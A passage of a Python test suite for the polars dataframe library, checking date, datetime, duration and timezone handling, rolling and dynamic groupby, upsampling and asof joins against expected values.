out.null_count() == 0\n assert out.dt[0] == dt\n assert out.dt[1] == dt\n\n dt1 = date(2001, 1, 1)\n dt2 = date(2001, 1, 2)\n dt3 = date(2001, 1, 3)\n s = pl.Series(\"a\", [dt1, dt2, dt3, None])\n dt_2 = date(2001, 1, 4)\n for fill_val in (dt_2, pl.lit(dt_2)):\n out = s.fill_null(fill_val)\n\n assert out.null_count() == 0\n assert out.dt[0] == dt1\n assert out.dt[1] == dt2\n assert out.dt[-1] == dt_2\n\n\ndef test_filter_date() -> None:\n dataset = pl.DataFrame(\n {\"date\": [\"2020-01-02\", \"2020-01-03\", \"2020-01-04\"], \"index\": [1, 2, 3]}\n )\n df = dataset.with_column(pl.col(\"date\").str.strptime(pl.Date, \"%Y-%m-%d\"))\n assert df.filter(pl.col(\"date\") <= pl.lit(datetime(2019, 1, 3))).is_empty()\n assert df.filter(pl.col(\"date\") < pl.lit(datetime(2020, 1, 4))).shape[0] == 2\n assert df.filter(pl.col(\"date\") < pl.lit(datetime(2020, 1, 5))).shape[0] == 3\n assert df.filter(pl.col(\"date\") <= pl.lit(date(2019, 1, 3))).is_empty()\n assert df.filter(pl.col(\"date\") < pl.lit(date(2020, 1, 4))).shape[0] == 2\n assert df.filter(pl.col(\"date\") < pl.lit(date(2020, 1, 5))).shape[0] == 3\n\n\ndef test_filter_time() -> None:\n df = pl.DataFrame({\"t\": [time(8, 0), time(9, 0), time(10, 0)]})\n assert df.filter(pl.col(\"t\") <= pl.lit(time(7, 0))).is_empty()\n assert df.filter(pl.col(\"t\") < pl.lit(time(10, 0))).shape[0] == 2\n assert df.filter(pl.col(\"t\") < pl.lit(time(11, 0))).shape[0] == 3\n\n\ndef test_series_add_timedelta() -> None:\n dates = pl.Series(\n [datetime(2000, 1, 1), datetime(2027, 5, 19), datetime(2054, 10, 4)]\n )\n out = pl.Series(\n [datetime(2027, 5, 19), datetime(2054, 10, 4), datetime(2082, 2, 19)]\n )\n assert (dates + timedelta(days=10_000)).series_equal(out)\n\n\ndef test_series_add_datetime() -> None:\n deltas = pl.Series([timedelta(10_000), timedelta(20_000), timedelta(30_000)])\n out = pl.Series(\n [datetime(2027, 5, 19), datetime(2054, 10, 4), datetime(2082, 2, 19)]\n )\n assert_series_equal(deltas + pl.Series([datetime(2000, 1, 1)]), out)\n\n\ndef test_diff_datetime() -> None:\n df = pl.DataFrame(\n {\n \"timestamp\": [\"2021-02-01\", \"2021-03-1\", \"2850-04-1\"],\n \"guild\": [1, 2, 3],\n \"char\": [\"a\", \"a\", \"b\"],\n }\n )\n\n out = (\n df.with_columns(\n [\n pl.col(\"timestamp\").str.strptime(pl.Date, fmt=\"%Y-%m-%d\"),\n ]\n ).with_columns([pl.col(\"timestamp\").diff().list().over(\"char\")])\n )[\"timestamp\"]\n assert (out[0] == out[1]).all()\n\n\ndef test_from_pydatetime() -> None:\n datetimes = [\n datetime(2021, 1, 1),\n datetime(2021, 1, 2),\n datetime(2021, 1, 3),\n datetime(2021, 1, 4, 12, 12),\n None,\n ]\n s = pl.Series(\"name\", datetimes)\n assert s.dtype == pl.Datetime\n assert s.name == \"name\"\n assert s.null_count() == 1\n assert s.dt[0] == datetimes[0]\n\n dates = [date(2021, 1, 1), date(2021, 1, 2), date(2021, 1, 3), None]\n s = pl.Series(\"name\", dates)\n assert s.dtype == pl.Date\n assert s.name == \"name\"\n assert s.null_count() == 1\n assert s.dt[0] == dates[0]\n\n\ndef test_int_to_python_datetime() -> None:\n df = pl.DataFrame({\"a\": [100_000_000, 200_000_000]}).with_columns(\n [\n pl.col(\"a\").cast(pl.Datetime).alias(\"b\"),\n pl.col(\"a\").cast(pl.Datetime(\"ms\")).alias(\"c\"),\n pl.col(\"a\").cast(pl.Datetime(\"us\")).alias(\"d\"),\n pl.col(\"a\").cast(pl.Datetime(\"ns\")).alias(\"e\"),\n ]\n )\n assert df.rows() == [\n (\n 100000000,\n datetime(1970, 1, 1, 0, 1, 40),\n datetime(1970, 1, 2, 3, 46, 40),\n datetime(1970, 1, 1, 0, 1, 40),\n datetime(1970, 1, 1, 0, 0, 0, 100000),\n ),\n (\n 200000000,\n datetime(1970, 1, 1, 0, 3, 20),\n datetime(1970, 1, 3, 7, 33, 20),\n datetime(1970, 1, 1, 0, 3, 20),\n datetime(1970, 1, 1, 0, 0, 0, 200000),\n ),\n ]\n assert df.select(\n [pl.col(col).dt.timestamp() for col in (\"c\", \"d\", \"e\")]\n + [\n getattr(pl.col(\"b\").cast(pl.Duration).dt, unit)().alias(f\"u[{unit}]\")\n for unit in (\"milliseconds\", \"microseconds\", \"nanoseconds\")\n ]\n ).rows() == [\n (100000000000, 100000000, 100000, 100000, 100000000, 100000000000),\n (200000000000, 200000000, 200000, 200000, 200000000, 200000000000),\n ]\n\n\ndef test_int_to_python_timedelta() -> None:\n df = pl.DataFrame({\"a\": [100_001, 200_002]}).with_columns(\n [\n pl.col(\"a\").cast(pl.Duration).alias(\"b\"),\n pl.col(\"a\").cast(pl.Duration(\"ms\")).alias(\"c\"),\n pl.col(\"a\").cast(pl.Duration(\"us\")).alias(\"d\"),\n pl.col(\"a\").cast(pl.Duration(\"ns\")).alias(\"e\"),\n ]\n )\n assert df.rows() == [\n (\n 100001,\n timedelta(microseconds=100001),\n timedelta(seconds=100, microseconds=1000),\n timedelta(microseconds=100001),\n timedelta(microseconds=100),\n ),\n (\n 200002,\n timedelta(microseconds=200002),\n timedelta(seconds=200, microseconds=2000),\n timedelta(microseconds=200002),\n timedelta(microseconds=200),\n ),\n ]\n\n assert df.select(\n [pl.col(col).dt.timestamp() for col in (\"c\", \"d\", \"e\")]\n ).rows() == [(100001, 100001, 100001), (200002, 200002, 200002)]\n\n\ndef test_from_numpy() -> None:\n # note: numpy timeunit support is limited to those supported by polars.\n # as a result, datetime64[s] will be stored as object.\n x = np.asarray(range(100_000, 200_000, 10_000), dtype=\"datetime64[s]\")\n s = pl.Series(x)\n assert s[0] == x[0]\n assert len(s) == 10\n\n\ndef test_datetime_consistency() -> None:\n dt = datetime(2022, 7, 5, 10, 30, 45, 123455)\n df = pl.DataFrame({\"date\": [dt]})\n\n assert df[\"date\"].dt[0] == dt\n\n for date_literal in (\n dt,\n np.datetime64(dt, \"us\"),\n np.datetime64(dt, \"ns\"),\n ):\n assert df.select(pl.lit(date_literal))[\"literal\"].dt[0] == dt\n assert df.filter(pl.col(\"date\") == date_literal).rows() == [(dt,)]\n\n ddf = df.select(\n [\n pl.col(\"date\"),\n pl.lit(dt).alias(\"dt\"),\n pl.lit(dt).cast(pl.Datetime(\"ms\")).alias(\"dt_ms\"),\n pl.lit(dt).cast(pl.Datetime(\"us\")).alias(\"dt_us\"),\n pl.lit(dt).cast(pl.Datetime(\"ns\")).alias(\"dt_ns\"),\n ]\n )\n assert ddf.schema == {\n \"date\": pl.Datetime(\"us\"),\n \"dt\": pl.Datetime(\"us\"),\n \"dt_ms\": pl.Datetime(\"ms\"),\n \"dt_us\": pl.Datetime(\"us\"),\n \"dt_ns\": pl.Datetime(\"ns\"),\n }\n assert ddf.select([pl.col(c).cast(int) for c in ddf.schema]).rows() == [\n (\n 1657017045123455,\n 1657017045123455,\n 1657017045123,\n 1657017045123455,\n 1657017045123455000,\n )\n ]\n\n test_data = [\n datetime(2000, 1, 1, 1, 1, 1, 555555),\n datetime(2514, 5, 30, 1, 53, 4, 986754),\n datetime(3099, 12, 31, 23, 59, 59, 123456),\n datetime(9999, 12, 31, 23, 59, 59, 999999),\n ]\n ddf = pl.DataFrame({\"dtm\": test_data}).with_column(\n pl.col(\"dtm\").dt.nanosecond().alias(\"ns\")\n )\n assert ddf.rows() == [\n (test_data[0], 555555000),\n (test_data[1], 986754000),\n (test_data[2], 123456000),\n (test_data[3], 999999000),\n ]\n\n\ndef test_timezone() -> None:\n ts = pa.timestamp(\"s\")\n data = pa.array([1000, 2000], type=ts)\n s: pl.Series = pl.from_arrow(data) # type: ignore[assignment]\n\n # with timezone; we do expect a warning here\n tz_ts = pa.timestamp(\"s\", tz=\"America/New_York\")\n tz_data = pa.array([1000, 2000], type=tz_ts)\n # with pytest.warns(Warning):\n tz_s: pl.Series = pl.from_arrow(tz_data) # type: ignore[assignment]\n\n # different timezones are not considered equal\n # we check both `null_equal=True` and `null_equal=False`\n # https://github.com/pola-rs/polars/issues/5023\n assert not s.series_equal(tz_s, null_equal=False)\n assert not s.series_equal(tz_s, null_equal=True)\n assert s.cast(int).series_equal(tz_s.cast(int))\n\n\ndef test_to_list() -> None:\n s = pl.Series(\"date\", [123543, 283478, 1243]).cast(pl.Date)\n\n out = s.to_list()\n assert out[0] == date(2308, 4, 2)\n\n s = pl.Series(\"datetime\", [a * 1_000_000 for a in [123543, 283478, 1243]]).cast(\n pl.Datetime\n )\n out = s.to_list()\n assert out[0] == datetime(1970, 1, 2, 10, 19, 3)\n\n\ndef test_rows() -> None:\n s0 = pl.Series(\"date\", [123543, 283478, 1243]).cast(pl.Date)\n s1 = (\n pl.Series(\"datetime\", [a * 1_000_000 for a in [123543, 283478, 1243]])\n .cast(pl.Datetime)\n .dt.with_time_unit(\"ns\")\n )\n df = pl.DataFrame([s0, s1])\n\n rows = df.rows()\n assert rows[0][0] == date(2308, 4, 2)\n assert rows[0][1] == datetime(1970, 1, 1, 0, 2, 3, 543000)\n\n\ndef test_to_numpy() -> None:\n s0 = pl.Series(\"date\", [123543, 283478, 1243]).cast(pl.Date)\n s1 = pl.Series(\n \"datetime\", [datetime(2021, 1, 2, 3, 4, 5), datetime(2021, 2, 3, 4, 5, 6)]\n )\n s2 = pl.date_range(\n datetime(2021, 1, 1, 0), datetime(2021, 1, 1, 1), interval=\"1h\", time_unit=\"ms\"\n )\n assert str(s0.to_numpy()) == \"['2308-04-02' '2746-02-20' '1973-05-28']\"\n assert (\n str(s1.to_numpy()[:2])\n == \"['2021-01-02T03:04:05.000000' '2021-02-03T04:05:06.000000']\"\n )\n assert (\n str(s2.to_numpy()[:2])\n == \"['2021-01-01T00:00:00.000' '2021-01-01T01:00:00.000']\"\n )\n s3 = pl.Series([timedelta(hours=1), timedelta(hours=-2)])\n out = np.array([3_600_000_000_000, -7_200_000_000_000], dtype=\"timedelta64[ns]\")\n assert (s3.to_numpy() == out).all()\n\n\ndef test_truncate() -> None:\n start = datetime(2001, 1, 1)\n stop = datetime(2001, 1, 2)\n\n s1 = pl.date_range(\n start, stop, timedelta(minutes=30), name=\"dates[ms]\", time_unit=\"ms\"\n )\n s2 = pl.date_range(\n start, stop, timedelta(minutes=30), name=\"dates[us]\", time_unit=\"us\"\n )\n s3 = pl.date_range(\n start, stop, timedelta(minutes=30), name=\"dates[ns]\", time_unit=\"ns\"\n )\n\n # can pass strings and timedeltas\n for out in [\n s1.dt.truncate(\"1h\"),\n s2.dt.truncate(\"1h0m0s\"),\n s3.dt.truncate(timedelta(hours=1)),\n ]:\n assert out.dt[0] == start\n assert out.dt[1] == start\n assert out.dt[2] == start + timedelta(hours=1)\n assert out.dt[3] == start + timedelta(hours=1)\n # ...\n assert out.dt[-3] == stop - timedelta(hours=1)\n assert out.dt[-2] == stop - timedelta(hours=1)\n assert out.dt[-1] == stop\n\n\ndef test_date_range() -> None:\n result = pl.date_range(\n date(1985, 1, 1), date(2015, 7, 1), timedelta(days=1, hours=12)\n )\n assert len(result) == 7426\n assert result.dt[0] == datetime(1985, 1, 1)\n assert result.dt[1] == datetime(1985, 1, 2, 12, 0)\n assert result.dt[2] == datetime(1985, 1, 4, 0, 0)\n assert result.dt[-1] == datetime(2015, 6, 30, 12, 0)\n\n for tu in DTYPE_TEMPORAL_UNITS:\n rng = pl.date_range(datetime(2020, 1, 1), date(2020, 1, 2), \"2h\", time_unit=tu)\n assert rng.time_unit == tu\n assert rng.shape == (13,)\n assert rng.dt[0] == datetime(2020, 1, 1)\n assert rng.dt[-1] == datetime(2020, 1, 2)\n\n # if low/high are both date, range is also be date _iif_ the granularity is >= 1d\n result = pl.date_range(date(2022, 1, 1), date(2022, 3, 1), \"1mo\", name=\"drange\")\n assert result.to_list() == [date(2022, 1, 1), date(2022, 2, 1), date(2022, 3, 1)]\n assert result.name == \"drange\"\n\n result = pl.date_range(date(2022, 1, 1), date(2022, 1, 2), \"1h30m\")\n assert list(result) == [\n datetime(2022, 1, 1, 0, 0),\n datetime(2022, 1, 1, 1, 30),\n datetime(2022, 1, 1, 3, 0),\n datetime(2022, 1, 1, 4, 30),\n datetime(2022, 1, 1, 6, 0),\n datetime(2022, 1, 1, 7, 30),\n datetime(2022, 1, 1, 9, 0),\n datetime(2022, 1, 1, 10, 30),\n datetime(2022, 1, 1, 12, 0),\n datetime(2022, 1, 1, 13, 30),\n datetime(2022, 1, 1, 15, 0),\n datetime(2022, 1, 1, 16, 30),\n datetime(2022, 1, 1, 18, 0),\n datetime(2022, 1, 1, 19, 30),\n datetime(2022, 1, 1, 21, 0),\n datetime(2022, 1, 1, 22, 30),\n datetime(2022, 1, 2, 0, 0),\n ]\n\n result = pl.date_range(\n datetime(2022, 1, 1), datetime(2022, 1, 1, 0, 1), \"987456321ns\"\n )\n assert len(result) == 61\n assert result.dtype.tu == \"ns\" # type: ignore[attr-defined]\n assert result.dt.second()[-1] == 59\n assert result.cast(pl.Utf8)[-1] == \"2022-01-01 00:00:59.247379260\"\n\n\n@pytest.mark.parametrize(\n \"one,two\",\n [\n (date(2001, 1, 1), date(2001, 1, 2)),\n (datetime(2001, 1, 1), datetime(2001, 1, 2)),\n (time(20, 10, 0), time(20, 10, 1)),\n # also test if the conversion stays correct with wide date ranges\n (date(201, 1, 1), date(201, 1, 2)),\n (date(5001, 1, 1), date(5001, 1, 2)),\n ],\n)\ndef test_date_comp(one: TemporalDataType, two: TemporalDataType) -> None:\n a = pl.Series(\"a\", [one, two])\n assert (a == one).to_list() == [True, False]\n assert (a == two).to_list() == [False, True]\n assert (a != one).to_list() == [False, True]\n assert (a > one).to_list() == [False, True]\n assert (a >= one).to_list() == [True, True]\n assert (a < one).to_list() == [False, False]\n assert (a <= one).to_list() == [True, False]\n\n\ndef test_truncate_negative_offset() -> None:\n df = pl.DataFrame(\n {\n \"event_date\": [\n datetime(2021, 4, 11),\n datetime(2021, 4, 29),\n datetime(2021, 5, 29),\n ],\n \"adm1_code\": [1, 2, 1],\n }\n )\n out = df.groupby_dynamic(\n index_column=\"event_date\",\n every=\"1mo\",\n period=\"2mo\",\n offset=\"-1mo\",\n include_boundaries=True,\n ).agg(\n [\n pl.col(\"adm1_code\"),\n ]\n )\n\n assert out[\"event_date\"].to_list() == [\n datetime(2021, 4, 1),\n datetime(2021, 4, 1),\n datetime(2021, 5, 1),\n ]\n df = pl.DataFrame(\n {\n \"event_date\": [\n datetime(2021, 4, 11),\n datetime(2021, 4, 29),\n datetime(2021, 5, 29),\n ],\n \"adm1_code\": [1, 2, 1],\n \"five_type\": [\"a\", \"b\", \"a\"],\n \"actor\": [\"a\", \"a\", \"a\"],\n \"admin\": [\"a\", \"a\", \"a\"],\n \"fatalities\": [10, 20, 30],\n }\n )\n\n out = df.groupby_dynamic(\n index_column=\"event_date\",\n every=\"1mo\",\n by=[\"admin\", \"five_type\", \"actor\"],\n ).agg([pl.col(\"adm1_code\").unique(), (pl.col(\"fatalities\") > 0).sum()])\n assert out[\"event_date\"].to_list() == [\n datetime(2021, 4, 1),\n datetime(2021, 5, 1),\n datetime(2021, 4, 1),\n ]\n\n for dt in [pl.Int32, pl.Int64]:\n df = pl.DataFrame(\n {\n \"idx\": np.arange(6),\n \"A\": [\"A\", \"A\", \"B\", \"B\", \"B\", \"C\"],\n }\n ).with_columns(pl.col(\"idx\").cast(dt))\n\n out = df.groupby_dynamic(\n \"idx\", every=\"2i\", period=\"3i\", include_boundaries=True\n ).agg(pl.col(\"A\").list())\n assert out.shape == (3, 4)\n\n\ndef test_to_arrow() -> None:\n date_series = pl.Series(\"dates\", [\"2022-01-16\", \"2022-01-17\"]).str.strptime(\n pl.Date, \"%Y-%m-%d\"\n )\n arr = date_series.to_arrow()\n assert arr.type == pa.date32()\n\n\ndef test_non_exact_strptime() -> None:\n a = pl.Series(\"a\", [\"2022-01-16\", \"2022-01-17\", \"foo2022-01-18\", \"b2022-01-19ar\"])\n fmt = \"%Y-%m-%d\"\n\n expected = pl.Series(\"a\", [date(2022, 1, 16), date(2022, 1, 17), None, None])\n verify_series_and_expr_api(\n a, expected, \"str.strptime\", pl.Date, fmt, strict=False, exact=True\n )\n\n expected = pl.Series(\n \"a\",\n [date(2022, 1, 16), date(2022, 1, 17), date(2022, 1, 18), date(2022, 1, 19)],\n )\n verify_series_and_expr_api(\n a, expected, \"str.strptime\", pl.Date, fmt, strict=False, exact=False\n )\n\n with pytest.raises(Exception):\n a.str.strptime(pl.Date, fmt, strict=True, exact=True)\n\n\ndef test_explode_date() -> None:\n datetimes = [\n datetime(2021, 12, 1, 0, 0),\n datetime(2021, 12, 1, 0, 0),\n datetime(2021, 12, 1, 0, 0),\n datetime(2021, 12, 1, 0, 0),\n ]\n dates = [\n date(2021, 12, 1),\n date(2021, 12, 1),\n date(2021, 12, 1),\n date(2021, 12, 1),\n ]\n for d in [dates, datetimes]:\n df = pl.DataFrame(\n {\n \"a\": d,\n \"b\": [\"a\", \"b\", \"a\", \"b\"],\n \"c\": [1.0, 2.0, 1.1, 2.2],\n }\n )\n out = (\n df.groupby(\"b\")\n .agg([pl.col(\"a\"), pl.col(\"c\").pct_change()])\n .explode([\"a\", \"c\"])\n )\n assert out.shape == (4, 3)\n\n\ndef test_rolling() -> None:\n dates = [\n \"2020-01-01 13:45:48\",\n \"2020-01-01 16:42:13\",\n \"2020-01-01 16:45:09\",\n \"2020-01-02 18:12:48\",\n \"2020-01-03 19:45:32\",\n \"2020-01-08 23:16:43\",\n ]\n\n df = pl.DataFrame({\"dt\": dates, \"a\": [3, 7, 5, 9, 2, 1]}).with_column(\n pl.col(\"dt\").str.strptime(pl.Datetime)\n )\n\n out = df.groupby_rolling(index_column=\"dt\", period=\"2d\").agg(\n [\n pl.sum(\"a\").alias(\"sum_a\"),\n pl.min(\"a\").alias(\"min_a\"),\n pl.max(\"a\").alias(\"max_a\"),\n ]\n )\n\n assert out[\"sum_a\"].to_list() == [3, 10, 15, 24, 11, 1]\n assert out[\"max_a\"].to_list() == [3, 7, 7, 9, 9, 1]\n assert out[\"min_a\"].to_list() == [3, 3, 3, 3, 2, 1]\n\n\ndef test_upsample() -> None:\n df = pl.DataFrame(\n {\n \"time\": [\n datetime(2021, 2, 1),\n datetime(2021, 4, 1),\n datetime(2021, 5, 1),\n datetime(2021, 6, 1),\n ],\n \"admin\": [\"Åland\", \"Netherlands\", \"Åland\", \"Netherlands\"],\n \"test2\": [0, 1, 2, 3],\n }\n ).with_column(pl.col(\"time\").dt.with_time_zone(\"UTC\"))\n\n up = df.upsample(\n time_column=\"time\", every=\"1mo\", by=\"admin\", maintain_order=True\n ).select(pl.all().forward_fill())\n # this print will panic if timezones feature is not activated\n # don't remove\n print(up)\n\n expected = pl.DataFrame(\n {\n \"time\": [\n datetime(2021, 2, 1, 0, 0),\n datetime(2021, 3, 1, 0, 0),\n datetime(2021, 4, 1, 0, 0),\n datetime(2021, 5, 1, 0, 0),\n datetime(2021, 4, 1, 0, 0),\n datetime(2021, 5, 1, 0, 0),\n datetime(2021, 6, 1, 0, 0),\n ],\n \"admin\": [\n \"Åland\",\n \"Åland\",\n \"Åland\",\n \"Åland\",\n \"Netherlands\",\n \"Netherlands\",\n \"Netherlands\",\n ],\n \"test2\": [0, 0, 0, 2, 1, 1, 3],\n }\n ).with_column(pl.col(\"time\").dt.with_time_zone(\"UTC\"))\n\n assert up.frame_equal(expected)\n\n\ndef test_microseconds_accuracy() -> None:\n timestamps = [\n datetime(2600, 1, 1, 0, 0, 0, 123456),\n datetime(2800, 1, 1, 0, 0, 0, 456789),\n ]\n a = pa.Table.from_arrays(\n arrays=[timestamps, [128, 256]],\n schema=pa.schema(\n [\n (\"timestamp\", pa.timestamp(\"us\")),\n (\"value\", pa.int16()),\n ]\n ),\n )\n\n assert pl.from_arrow(a)[\"timestamp\"].to_list() == timestamps\n\n\ndef test_cast_time_units() -> None:\n dates = pl.Series(\"dates\", [datetime(2001, 1, 1), datetime(2001, 2, 1, 10, 8, 9)])\n dates_in_ns = np.array([978307200000000000, 981022089000000000])\n\n assert dates.dt.cast_time_unit(\"ns\").cast(int).to_list() == list(dates_in_ns)\n assert dates.dt.cast_time_unit(\"us\").cast(int).to_list() == list(\n dates_in_ns // 1_000\n )\n assert dates.dt.cast_time_unit(\"ms\").cast(int).to_list() == list(\n dates_in_ns // 1_000_000\n )\n\n\ndef test_read_utc_times_parquet() -> None:\n df = pd.DataFrame(\n data={\n \"Timestamp\": pd.date_range(\n \"2022-01-01T00:00+00:00\", \"2022-01-01T10:00+00:00\", freq=\"H\"\n )\n }\n )\n f = io.BytesIO()\n df.to_parquet(f)\n f.seek(0)\n df_in = pl.read_parquet(f)\n tz = zoneinfo.ZoneInfo(\"UTC\")\n assert df_in[\"Timestamp\"][0] == datetime(2022, 1, 1, 0, 0).astimezone(tz)\n\n\ndef test_epoch() -> None:\n dates = pl.Series(\"dates\", [datetime(2001, 1, 1), datetime(2001, 2, 1, 10, 8, 9)])\n\n for unit in DTYPE_TEMPORAL_UNITS:\n assert dates.dt.epoch(unit).series_equal(dates.dt.timestamp(unit))\n\n assert dates.dt.epoch(\"s\").series_equal(dates.dt.timestamp(\"ms\") // 1000)\n assert dates.dt.epoch(\"d\").series_equal(\n (dates.dt.timestamp(\"ms\") // (1000 * 3600 * 24)).cast(pl.Int32)\n )\n\n\ndef test_default_negative_every_offset_dynamic_groupby() -> None:\n # 2791\n dts = [\n datetime(2020, 1, 1),\n datetime(2020, 1, 2),\n datetime(2020, 2, 1),\n datetime(2020, 3, 1),\n ]\n df = pl.DataFrame({\"dt\": dts, \"idx\": range(len(dts))})\n out = df.groupby_dynamic(index_column=\"dt\", every=\"1mo\", closed=\"right\").agg(\n pl.col(\"idx\")\n )\n\n expected = pl.DataFrame(\n {\n \"dt\": [\n datetime(2020, 1, 1, 0, 0),\n datetime(2020, 1, 1, 0, 0),\n datetime(2020, 3, 1, 0, 0),\n ],\n \"idx\": [[0], [1, 2], [3]],\n }\n )\n assert out.frame_equal(expected)\n\n\ndef test_strptime_dates_datetimes() -> None:\n s = pl.Series(\"date\", [\"2021-04-22\", \"2022-01-04 00:00:00\"])\n assert s.str.strptime(pl.Datetime).to_list() == [\n datetime(2021, 4, 22, 0, 0),\n datetime(2022, 1, 4, 0, 0),\n ]\n\n\ndef test_strptime_precision() -> None:\n s = pl.Series(\n \"date\", [\"2022-09-12 21:54:36.789321456\", \"2022-09-13 12:34:56.987456321\"]\n )\n ds = s.str.strptime(pl.Datetime)\n assert ds.cast(pl.Date) != None # noqa: E711 (note: *deliberately* testing \"!=\")\n assert getattr(ds.dtype, \"tu\", None) == \"us\"\n\n time_units: list[TimeUnit] = [\"ms\", \"us\", \"ns\"]\n suffixes = [\"%.3f\", \"%.6f\", \"%.9f\"]\n test_data = zip(\n time_units,\n suffixes,\n (\n [789000000, 987000000],\n [789321000, 987456000],\n [789321456, 987456321],\n ),\n )\n for precision, suffix, expected_values in test_data:\n ds = s.str.strptime(pl.Datetime(precision), f\"%Y-%m-%d %H:%M:%S{suffix}\")\n assert getattr(ds.dtype, \"tu\", None) == precision\n assert ds.dt.nanosecond().to_list() == expected_values\n\n\ndef test_asof_join_tolerance_grouper() -> None:\n from datetime import date\n\n df1 = pl.DataFrame({\"date\": [date(2020, 1, 5), date(2020, 1, 10)], \"by\": [1, 1]})\n df2 = pl.DataFrame(\n {\n \"date\": [date(2020, 1, 5), date(2020, 1, 6)],\n \"by\": [1, 1],\n \"values\": [100, 200],\n }\n )\n\n out = df1.join_asof(df2, by=\"by\", on=\"date\", tolerance=\"3d\")\n\n expected = pl.DataFrame(\n {\n \"date\": [date(2020, 1, 5), date(2020, 1, 10)],\n \"by\": [1, 1],\n \"values\": [100, None],\n }\n )\n\n assert out.frame_equal(expected)\n\n\ndef test_duration_function() -> None:\n df = pl.DataFrame(\n {\n \"datetime\": [datetime(2022, 1, 1), datetime(2022, 1, 2)],\n \"add\": [1, 2],\n }\n )\n\n out = df.select(\n [\n (pl.col(\"datetime\") + pl.duration(weeks=\"add\")).alias(\"add_weeks\"),\n (pl.col(\"datetime\") + pl.duration(days=\"add\")).alias(\"add_days\"),\n (pl.col(\"datetime\") + pl.duration(seconds=\"add\")).alias(\"add_seconds\"),\n (pl.col(\"datetime\") + pl.duration(milliseconds=\"add\")).alias(\n \"add_milliseconds\"\n ),\n (pl.col(\"datetime\") + pl.duration(hours=\"add\")).alias(\"add_hours\"),\n ]\n )\n\n expected = pl.DataFrame(\n {\n \"add_weeks\": [datetime(2022, 1, 8), datetime(2022, 1, 16)],\n \"add_days\": [datetime(2022, 1, 2), datetime(2022, 1, 4)],\n \"add_seconds\": [\n datetime(2022, 1, 1, second=1),\n datetime(2022, 1, 2, second=2),\n ],\n \"add_milliseconds\": [\n datetime(2022, 1, 1, microsecond=1000),\n datetime(2022, 1, 2, microsecond=2000),\n ],\n \"add_hours\": [datetime(2022, 1, 1, hour=1), datetime(2022, 1, 2, hour=2)],\n }\n )\n\n assert out.frame_equal(expected)\n\n\ndef test_rolling_groupby_by_argument() -> None:\n df = pl.DataFrame({\"times\": range(10), \"groups\": [1] * 4 + [2] * 6})\n\n out = df.groupby_rolling(\"times\", \"5i\", by=[\"groups\"]).agg(\n pl.col(\"times\").list().alias(\"agg_list\")\n )\n\n expected = pl.DataFrame(\n {\n \"groups\": [1, 1, 1, 1, 2, 2, 2, 2, 2, 2],\n \"times\": [0, 1, 2, 3, 4, 5, 6, 7, 8, 9],\n \"agg_list\": [\n [0],\n [0, 1],\n [0, 1, 2],\n [0, 1, 2, 3],\n [4],\n [4, 5],\n [4, 5, 6],\n [4, 5, 6, 7],\n [4, 5, 6, 7, 8],\n [5, 6, 7, 8, 9],\n ],\n }\n )\n\n assert out.frame_equal(expected)\n\n\ndef test_groupby_rolling_mean_3020() -> None:\n df = pl.DataFrame(\n {\n \"Date\": [\n \"1998-04-12\",\n \"1998-04-19\",\n \"1998-04-26\",\n \"1998-05-03\",\n \"1998-05-10\",\n \"1998-05-17\",\n \"1998-05-24\",\n ],\n \"val\": range(7),\n }\n ).with_column(pl.col(\"Date\").str.strptime(pl.Date))\n assert (\n df.groupby_rolling(index_column=\"Date\", period=\"1w\")\n .agg(pl.col(\"val\").mean().alias(\"val_mean\"))\n .frame_equal(\n pl.DataFrame(\n {\n \"Date\": [\n date(1998, 4, 12),\n date(1998, 4, 19),\n date(1998, 4, 26),\n date(1998, 5, 3),\n date(1998, 5, 10),\n date(1998, 5, 17),\n date(1998, 5, 24),\n ],\n \"val_mean\": [0.0, 1.0, 2.0, 3.0, 4.0, 5.0, 6.0],\n }\n )\n )\n )\n\n\ndef test_asof_join() -> None:\n fmt = \"%F %T%.3f\"\n dates = [\n \"2016-05-25 13:30:00.023\",\n \"2016-05-25 13:30:00.023\",\n \"2016-05-25 13:30:00.030\",\n \"2016-05-25 13:30:00.041\",\n \"2016-05-25 13:30:00.048\",\n \"2016-05-25 13:30:00.049\",\n \"2016-05-25 13:30:00.072\",\n \"2016-05-25 13:30:00.075\",\n ]\n ticker = [\n \"GOOG\",\n \"MSFT\",\n \"MSFT\",\n \"MSFT\",\n \"GOOG\",\n \"AAPL\",\n \"GOOG\",\n \"MSFT\",\n ]\n quotes = pl.DataFrame(\n {\n \"dates\": pl.Series(dates).str.strptime(pl.Datetime, fmt=fmt),\n \"ticker\": ticker,\n \"bid\": [720.5, 51.95, 51.97, 51.99, 720.50, 97.99, 720.50, 52.01],\n }\n )\n dates = [\n \"2016-05-25 13:30:00.023\",\n \"2016-05-25 13:30:00.038\",\n \"2016-05-25 13:30:00.048\",\n \"2016-05-25 13:30:00.048\",\n \"2016-05-25 13:30:00.048\",\n ]\n ticker = [\n \"MSFT\",\n \"MSFT\",\n \"GOOG\",\n \"GOOG\",\n \"AAPL\",\n ]\n trades = pl.DataFrame(\n {\n \"dates\": pl.Series(dates).str.strptime(pl.Datetime, fmt=fmt),\n \"ticker\": ticker,\n \"bid\": [51.95, 51.95, 720.77, 720.92, 98.0],\n }\n )\n assert trades.schema == {\n \"dates\": pl.Datetime(\"ms\"),\n \"ticker\": pl.Utf8,\n \"bid\": pl.Float64,\n }\n out = trades.join_asof(quotes, on=\"dates\", strategy=\"backward\")\n\n assert out.schema == {\n \"bid\": pl.Float64,\n \"bid_right\": pl.Float64,\n \"dates\": pl.Datetime(\"ms\"),\n \"ticker\": pl.Utf8,\n \"ticker_right\": pl.Utf8,\n }\n assert out.columns == [\"dates\", \"ticker\", \"bid\", \"ticker_right\", \"bid_right\"]\n assert (out[\"dates\"].cast(int)).to_list() == [\n 1464183000023,\n 1464183000038,\n 1464183000048,\n 1464183000048,\n 1464183000048,\n ]\n assert trades.join_asof(quotes, on=\"dates\", strategy=\"forward\")[\n \"bid_right\"\n ].to_list() == [720.5, 51.99, 720.5, 720.5, 720.5]\n\n out = trades.join_asof(quotes, on=\"dates\", by=\"ticker\")\n assert out[\"bid_right\"].to_list() == [51.95, 51.97, 720.5, 720.5, None]\n\n out = quotes.join_asof(trades, on=\"dates\", by=\"ticker\")\n assert out[\"bid_right\"].to_list() == [\n None,\n 51.95,\n 51.95,\n 51.95,\n 720.92,\n 98.0,\n 720.92,\n 51.95,\n ]\n assert quotes.join_asof(trades, on=\"dates\", strategy=\"backward\", tolerance=\"5ms\")[\n \"bid_right\"\n ].to_list() == [51.95, 51.95, None, 51.95, 98.0, 98.0, None, None]\n assert quotes.join_asof(trades, 